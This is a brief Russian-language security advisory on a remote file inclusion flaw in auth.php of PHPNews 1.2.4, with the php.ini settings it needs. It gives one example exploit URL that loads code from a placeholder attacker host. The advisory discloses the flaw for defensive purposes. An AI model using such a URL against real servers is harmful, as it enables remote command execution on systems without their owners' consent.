Программа: PHPNews 1.2.4

Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на уязвимой системе. Уязвимость
существует в сценарии ‘auth.php’ из-за
некорректной обработки входных данных в
некоторых переменных. Злоумышленник может
с помощью специально сформированного URL
выполнить произвольные команды на уязвимой
системе с привилегиями web сервера.

Пример:

http://[target]/[dir]/auth.php?path=http://[attacker]/

Для удачной эксплуатации уязвимости
register_globals и allow_url_fopen должны быть включены в
конфигурационном файле php.ini.

Оставить мнение